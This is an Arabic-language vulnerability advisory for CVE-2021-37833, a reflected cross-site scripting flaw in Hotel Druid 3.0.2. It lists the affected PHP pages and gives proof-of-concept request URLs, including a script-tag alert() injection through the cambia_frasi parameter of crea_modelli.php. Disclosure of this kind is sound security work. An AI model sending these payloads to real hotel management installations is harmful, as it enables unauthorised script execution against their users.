
CVE 2021-37833 Hotel Druid 3.0.2 ثغرة البرمجة النصية عبر المواقع المنعكسة
توجد ثغرة برمجة نصية عبر الموقع المنعكسة في عدة صفحات من الإصدار 3.0.2 من تطبيق Hotel Druid تسمح بتنفيذ أوامر JavaScript بشكل تعسفي. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37833
صفحات PHP المعرضة للخطر:
crea_modelli.php - معامل cambia_frasi visualizza_tabelle.php - معامل URL عشوائي tabella.php - معامل URL عشوائي storia_soldi.php - معامل URL عشوائي
الحمولات المعرضة للخطر
/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1
/storia_soldi.php?piu17">e3esq=1
/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(%27xss%20hotel%20druid%27)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1
/tabella.php?jkuh3">yql8b=1
اكتشفها Joe Helle، يوليو 2021